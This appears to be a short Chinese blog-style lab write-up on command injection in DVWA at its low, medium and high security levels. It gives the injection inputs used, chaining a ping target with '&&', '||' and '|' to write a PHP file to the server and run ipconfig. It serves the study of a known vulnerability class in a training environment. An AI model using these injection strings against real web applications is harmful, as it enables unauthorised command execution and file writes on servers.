命令執行漏洞

實驗環境:DVWA、Apache、php5.2

實驗原理:

       日常的網絡訪問中,我們常常可以看到某些Web網站具有執行系統命令的功能,比如:有些網站提供ping功能,我們可以輸入一個IP地址,它就會幫我們去嘗試ping目標的IP地址,而我們則可以看到執行結果。但是如果用戶沒有遵循網站的本意,而去輸入精心構造的指令,可能會對網站本身的功能邏輯產生逆轉,導致讓目標網站執行惡意命令。

實驗步驟:

實驗一:低級別DVWA

1.在輸入框輸入:www.baidu.com && echo "<?php phpinfo()?>" > 1.php,可看到命令執行成功

2.訪問php文件

 實驗二:中級別DVWA

輸入:www,nbj.jhg || ipconfig,可看到命令執行成功

實驗三:高級別DVWA

輸入:www,nbj.jhg |ipconfig,可看到命令執行成功

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章